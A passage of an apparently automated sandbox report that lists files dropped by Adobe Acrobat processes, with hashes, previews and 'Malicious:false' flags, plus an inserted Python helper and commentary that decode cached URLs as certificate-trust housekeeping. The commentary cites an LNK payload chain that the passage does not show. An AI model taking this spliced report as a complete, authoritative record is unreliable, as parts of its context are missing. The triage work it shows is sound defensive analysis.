                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):330
                                          Entropy (8bit):5.158839447905453
                                          Encrypted:false
                                          SSDEEP:6:5SJat9+q2PN72nKuAl9OmbzNMxIFUt8MSJa0iJZmw+MSJag9VkwON72nKuAl9Omk:fX+vVaHAa8jFUt8E08/+E+V5OaHAa84J
                                          MD5:B84ED15AEF3DCE530DA71531CF701556
                                          SHA1:416FA5FE5CBC71CFC2716809FC4E94E1BFCF9BD4
                                          SHA-256:45776E1A32148240102AE81EAE3E945CC1DA6F61EFCE2EC2384C1F636C663DA7
                                          SHA-512:32ACCD0B6BB67FB96437114E72F535D36D05CB8C88E641129E435C21F5FB9C540C7DC96A7F88FE111FADA18E33C8EFD45394465877ABB4C055E1DAAE96D3B8F9
                                          Malicious:false
                                          Preview:2024/12/31-04:38:08.386 1d2c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/31-04:38:08.388 1d2c Recovering log #3.2024/12/31-04:38:08.389 1d2c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):330
                                          Entropy (8bit):5.158839447905453
                                          Encrypted:false
                                          SSDEEP:6:5SJat9+q2PN72nKuAl9OmbzNMxIFUt8MSJa0iJZmw+MSJag9VkwON72nKuAl9Omk:fX+vVaHAa8jFUt8E08/+E+V5OaHAa84J
                                          MD5:B84ED15AEF3DCE530DA71531CF701556
                                          SHA1:416FA5FE5CBC71CFC2716809FC4E94E1BFCF9BD4
                                          SHA-256:45776E1A32148240102AE81EAE3E945CC1DA6F61EFCE2EC2384C1F636C663DA7
                                          SHA-512:32ACCD0B6BB67FB96437114E72F535D36D05CB8C88E641129E435C21F5FB9C540C7DC96A7F88FE111FADA18E33C8EFD45394465877ABB4C055E1DAAE96D3B8F9
                                          Malicious:false
                                          Preview:2024/12/31-04:38:08.386 1d2c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/31-04:38:08.388 1d2c Recovering log #3.2024/12/31-04:38:08.389 1d2c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                          Category:dropped
                                          Size (bytes):65110
                                          Entropy (8bit):2.9110196685429117
                                          Encrypted:false
                                          SSDEEP:192:skW8b9hgpYcEHRHbYjA091vHLvc5LHyVov:skW8b9hgpYcEHRHbsl91vHLvc5LHyVov
                                          MD5:F8B2DC7C8853459FB20B7656F92788CF
                                          SHA1:298E41FB7D297CD5AE698AD64762DEA3EC38CB45
                                          SHA-256:0F9709C4DD79A575EB74706A645B07E9DDE958673FE6032BF42DAA0DAA1FD136
                                          SHA-512:6D4CFF6225243FE1D3BAA993AC095438D212AA42CC59223B21786A1CD6F066F2490945040538365E4FE111EAB779B4C1A915BC6D28910D68A8E0D65F6A3CC2CB
                                          Malicious:false
                                          Preview:BMV.......6...(...k...h..... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):86016
                                          Entropy (8bit):4.444894941217673
                                          Encrypted:false
                                          SSDEEP:384:ye6ci5t1iBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:mes3OazzU89UTTgUL
                                          MD5:A05C701154D24B7322408B9BEF6C065D
                                          SHA1:1F5B607E8963E1221692D922565218BB8B230695
                                          SHA-256:AEDB53F390F1992EF128587FC6145395180F8D45A8FAC541586F2000FFE9471F
                                          SHA-512:CD9C1CCEF78DC21FEA22A30CB51D91A2EC523B6593FD1D35C420789B68439063162A7E0A046A0EAA05653204D10D20661C6A2F7D09B4E31125BF33F043B5F8B5
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:SQLite Rollback Journal
                                          Category:dropped
                                          Size (bytes):8720
                                          Entropy (8bit):3.764917447129481
                                          Encrypted:false
                                          SSDEEP:48:7Mk7JioyVvioyfoy1C7oy16oy1pKOioy1noy1AYoy1Wioy1oioykioyBoy1noy1U:7p7JuvNwXjBi4b9IVXEBodRBkN
                                          MD5:CE5E80DA7633EE3CF6C6D6AE935ADD08
                                          SHA1:620C49DC44CFFDD0AA9B1CD42521408E6366F058
                                          SHA-256:9580D95F7291911D0A1CE4D4AD52AAA8F89055750235D7E1F6499C87884356B4
                                          SHA-512:5FB8713E0A5B52477BD7236716F96A116938C91E53423600F477F6F06905EA6A0DC49645DCA549E199947C1CC25F5D47A2B360FE2855F1D8A5F621651E51DD31
                                          Malicious:false
                                          Preview:.... .c.....m.S................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:Certificate, Version=3
                                          Category:dropped
                                          Size (bytes):1391
                                          Entropy (8bit):7.705940075877404
                                          Encrypted:false
                                          SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                          Malicious:false
                                          Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                          Category:dropped
                                          Size (bytes):71954
                                          Entropy (8bit):7.996617769952133
                                          Encrypted:true
                                          SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                          MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                          SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                          SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                          SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                          Malicious:false
                                          Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):192
                                          Entropy (8bit):2.7464849065063075
                                          Encrypted:false
                                          SSDEEP:3:kkFkl4DM+kNllXfllXlE/HT8ka/hlltNNX8RolJuRdxLlGB9lQRYwpDdt:kKhD1T877NMa8RdWBwRd
                                          MD5:EC617266FB2A00938E84E772B592B42D
                                          SHA1:8292B50D2DEC5EB94C7B5501A2C57AE7A03EEF11
                                          SHA-256:4090C373E7A6829541D85B7236BD00B467A48096EEC2BF9D94B3AE9EE5E8BBA3
                                          SHA-512:0BF03540850473F9D36C465340D7AFA78995A8032CB600E04DB9004AC381DFC02132F79E9D916DCE2F70F6EF2CF7CDA2D1877248652526F572F080CD50BDC244
                                          Malicious:false
                                          Preview:p...... ........Kf..g[..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):328
                                          Entropy (8bit):3.2539954282295116
                                          Encrypted:false
                                          SSDEEP:6:kKqT9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:nDImsLNkPlE99SNxAhUe/3
                                          MD5:0EC2FDF81EE3D769DE9ACA6028632F5D
                                          SHA1:6CEA27B445E11A6FEE0AFCFE28A1DD73D52D0EA4
                                          SHA-256:36D2F1C6F3DBAE271B70CC8C964680F567676663B261B2544C66239405EBCF5D
                                          SHA-512:DACF1C249B92C37956B05CDD4585BD39BF96E63ED51058E1E562F3A0AF892644F7DD28FBAC1CAE03D75A268174AD624369A46644562D811BE319F646F650D167
                                          Malicious:false
                                          Preview:p...... ........,.^.g[..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
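The two AcroCEF "data" entries above each carry a UTF-16LE string that the report renders as "h.t.t.p.:././" because every non-printable byte of the Preview is printed as ".". Reading them by hand is error-prone: a real "." in the data prints exactly like a null byte. The Python below is an added example (not part of the Joe Sandbox report and not Adobe's code) that recovers those strings from the two Preview fields copied from the page and checks the URLs against a small allowlist. The allowlist and the min_pairs threshold are this example's own assumptions. What comes out is the point worth recording in triage: the URLs are Let's Encrypt's CA-issuer endpoint (which serves ISRG Root X1, the 1391-byte certificate dropped just above) and Microsoft's trusted-root CTL download (the authroot.stl cabinet dropped just above), so these two cache entries are the PDF viewer refreshing trust material, not traffic from the LNK's payload chain.

```python
"""Recover the UTF-16 strings the report shows as 'h.t.t.p.:././' in a Preview.

Added example, not part of the Joe Sandbox report. The two preview strings are
copied from the page; the URL allowlist is this example's own assumption.
"""
import re

# Constructed input: the Preview fields of the two AcroCEF cache entries above,
# copied from the report. Each UTF-16LE code unit of an ASCII character shows
# up as the character followed by one '.' (the zero high byte).
PREVIEW_LENCR = 'p...... ........Kf..g[..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...'
PREVIEW_CTL = 'p...... ........,.^.g[..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...'

# Hosts a PDF viewer legitimately contacts while validating certificates
# (this example's own allowlist, assumed): Let's Encrypt's CA-issuer endpoint
# and Microsoft's trusted-root CTL download.
TRUST_HOUSEKEEPING_HOSTS = {"x1.i.lencr.org", "ctldl.windowsupdate.com"}


def recover_wide_strings(preview: str, min_pairs: int = 8) -> list:
    """Return each run of 'c.h.a.r' text decoded back to ASCII.

    A literal '.' in the data is printed the same way as a null byte, so a run
    of dots is ambiguous. Pairing greedily from the left is still safe: every
    real character pins the alignment (it must sit on the first byte of a
    pair), and a run of pure dots just decodes to junk the caller filters out.
    """
    pattern = re.compile(r"(?:[ -~]\.){%d,}" % min_pairs)
    return [m.group(0)[0::2] for m in pattern.finditer(preview)]


def extract_urls(preview: str) -> list:
    """URLs found inside the recovered wide strings, trailing nulls stripped."""
    urls = []
    for text in recover_wide_strings(preview):
        for m in re.finditer(r'https?://[^\s"]+', text):
            urls.append(m.group(0).rstrip("."))
    return urls


def is_trust_housekeeping(url: str) -> bool:
    """True when the URL's host is on the allowlist above."""
    host = re.match(r"https?://([^/]+)", url).group(1)
    return host in TRUST_HOUSEKEEPING_HOSTS


if __name__ == "__main__":
    for name, preview in (("lencr", PREVIEW_LENCR), ("ctl", PREVIEW_CTL)):
        for url in extract_urls(preview):
            verdict = "trust housekeeping" if is_trust_housekeeping(url) else "CHECK"
            print(name, url, verdict)
```

Run as a script, both previews print their single URL with the "trust housekeeping" verdict. The quoted token that follows each URL in the decoded text ("64cd6654-56f", "a7282eb40b1da1:0") is left alone here; it reads like a cache validator, but the report does not say what it is. In a real triage the allowlist should be your own, and any recovered URL not on it is the one to pivot on.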
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):295
                                          Entropy (8bit):5.342978084772167
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJM3g98kUwPeUkwRe9:YvXKXasJpH0cORsGMbLUkee9
                                          MD5:5AEA62F9C38144904730D2C65664A994
                                          SHA1:98FB27219B1000690670DB8756F2D4DB12E5AAE1
                                          SHA-256:7FE0EDB1854860CDEFA1CC68709D641A44A8E091BDDA06505365D69F962C96D7
                                          SHA-512:1088CACE4AA92F289FB5EDC7A9AD692AE7B6F6818F00ACFA5D7436E0144EEBBCE8DCC2CFCE5B8BE5D7F0853ED29570C7545F3B191AC07010AFF2715ECC116F50
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):294
                                          Entropy (8bit):5.29360488294335
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJfBoTfXpnrPeUkwRe9:YvXKXasJpH0cORsGWTfXcUkee9
                                          MD5:AA04B30BA6E0FE3411259BE84E692CB2
                                          SHA1:5C4F310FD8C08D00E92FC5FA2AF2476078DA2A5F
                                          SHA-256:E371125D506D1E4007BB979B345C25718D1ABF384D1588217713410DD8BA0B75
                                          SHA-512:896336777105A18A36201C88AFFF49525D37C79B5384328BF9D3BFC800EFDCCCA7BE6A37415031E310D0D97A652ECA868562AA9A4B19DB1D6F0D9F41F217A60B
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):294
                                          Entropy (8bit):5.272599918338425
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJfBD2G6UpnrPeUkwRe9:YvXKXasJpH0cORsGR22cUkee9
                                          MD5:6453DB71082F10DA6293FE6323280096
                                          SHA1:3AE3D1901ED74D8200F09409CB7D69F2CDB52E44
                                          SHA-256:B1401E7E9AB395E0524EAD00CDDCFF02DE8A156D503312AC23E976D3FC5F8947
                                          SHA-512:F68667F5E9834CE15E82A210CE5FD8AD7870D6C7700263F8CFD30577A3466308D45CF73A34CE4AE9BFFB1BABC8761A73C0486A2ABC6B19EA9FA4028A60CFFCCD
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):285
                                          Entropy (8bit):5.322285386697682
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJfPmwrPeUkwRe9:YvXKXasJpH0cORsGH56Ukee9
                                          MD5:ADB54A7009DB9A80B1F2496F8B4BE975
                                          SHA1:52798C25E8FEC7E8D6AC326BDDEF58C3FDC56556
                                          SHA-256:2FD132BEC84D5AEC3186E21E4952FDDA3075651FDA171403117D5591D7F801EA
                                          SHA-512:FAF314F246C645BFEE5764B3E1389A2ACA47D3DA36BF0A186794D487FE2748529CF83BB77A3F19574080A63B079DF82F423B1B83FA16FE31048E0F64B35AAF7E
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):1123
                                          Entropy (8bit):5.6926768616400425
                                          Encrypted:false
                                          SSDEEP:24:Yv6XDp5WpLgE9cQx8LennAvzBvkn0RCmK8czOCCS1w:Yv06hgy6SAFv5Ah8cv/1w
                                          MD5:36F9962099673451FD475FE9498A7816
                                          SHA1:D669BD53B3F80878EF80FF37E6B565CC9D7A03B0
                                          SHA-256:0D9E7F7878321B66E16A1FD863026FB06C1FF7C998423060789AA612D56BEB1B
                                          SHA-512:1958E621D9EB74ED0FCA59854DFECA656915A151C71E5F6B89706A6971BA9213B2290A4A2595176A103290C6D02F5C447D3E19F5C25F87C9B9852703D5B2475E
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):289
                                          Entropy (8bit):5.272074662629678
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJf8dPeUkwRe9:YvXKXasJpH0cORsGU8Ukee9
                                          MD5:798EC9B023582735DCC6BA554844547A
                                          SHA1:E8F8485FE17C2B5F257C456DD712DD413D5F58E4
                                          SHA-256:480B1F740BEF8D259513A89F771D431A7A0D70D16A9C1B400B9F90F3A4B09C3C
                                          SHA-512:8845AA24C494FC57479C77A3410BE90ADF7B300F1C94B49EA09B64EC37BC54A071EDE80047CE070D91CF5E6364A6BB6BC3CDB26D79FB313A89A45C2E35A09E60
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):292
                                          Entropy (8bit):5.27501381892357
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJfQ1rPeUkwRe9:YvXKXasJpH0cORsGY16Ukee9
                                          MD5:0BFC3F29550AF4E8B48294249F4DB4F7
                                          SHA1:A7354FCE1F5220DDB18C817072572C68005DD9B1
                                          SHA-256:A2A21FD40172E8F7320BCCAB998C151F3735B1E54CE678F4948D64C57B291593
                                          SHA-512:F8F438916510FC8506959FEA21A174102032BEC3599BFAB6EFD38ADF17A778E3A5922847E116966ECE19C9238CB2D99C06410E3CBF19D87B1FEB2D8841ECCCFB
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):289
                                          Entropy (8bit):5.28205916353848
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJfFldPeUkwRe9:YvXKXasJpH0cORsGz8Ukee9
                                          MD5:FB0B1FB12D3C0399E49ADA9F03EC02F2
                                          SHA1:042941E693AC0A95DD7E1CA596289C88ED173394
                                          SHA-256:5050D63876CCF65CC187CE43B644976076332CF67FE1E0CB34175AC5C4D5ECEE
                                          SHA-512:F7B6F7740E7E3D7B4BCF899AD383CE82E14670171B598A4BDD83090881CA184C90BBB0ADB6FE3562321FF040CF8235A3D6301FE0C1B486234FFBDC02672C2720
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):295
                                          Entropy (8bit):5.298829334937266
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJfzdPeUkwRe9:YvXKXasJpH0cORsGb8Ukee9
                                          MD5:2861E10C5A57094038B5CF930B42000E
                                          SHA1:8E065340ED941F40B1A0B8C0A337882B743C277A
                                          SHA-256:08709653814459280AB3EDF3D2BE8D0DBE9A37F99107879CD9601A0FD493633C
                                          SHA-512:E376A7ABF428DC87E3845CC15C1F694410ED16CA0211A444521F7023CD8DDC5177E81C921905EDC2D5CEB6E41B3B3C4CA2149CBB1DC1350182B05D41A1251C39
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):289
                                          Entropy (8bit):5.279046760354939
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJfYdPeUkwRe9:YvXKXasJpH0cORsGg8Ukee9
                                          MD5:FB70A55576A2E9272014F2D1AFD28DB1
                                          SHA1:A3519576C11D7688F6FD9B580ECE9914BCEECC16
                                          SHA-256:A04C1175C7D60CE4D3CF7052CA337D01D64D43EAD5AEDAB4E7C7863718A0A758
                                          SHA-512:4F040A71AAABB970769B58C100DA8B13A6A88125D944C2175FE7363F1DE8CD3D96FF82A0D2B2ECA4A713F66C065DDFBAAC3F078BF1D19F3C3D9C59030DD6498F
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):284
                                          Entropy (8bit):5.26502722904128
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJf+dPeUkwRe9:YvXKXasJpH0cORsG28Ukee9
                                          MD5:DA54944971A381B678727531D5E3204F
                                          SHA1:A7132CCC1A4A8E0A032D0250786476D2CEAFE9CE
                                          SHA-256:9F38C7054BA1BD5D10738C0D8030265CFD394BA40F08C6FC0C95DF3D0CAF44D3
                                          SHA-512:EDF18D92FA5B557DCC83593DCFD36B268979D263E46F39A75C7770271EDA1442889D530398B6CAF974144C429996D6A95EDE8BDFDB704C7F79C31230492C6CAF
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):291
                                          Entropy (8bit):5.262737866548701
                                          Encrypted:false
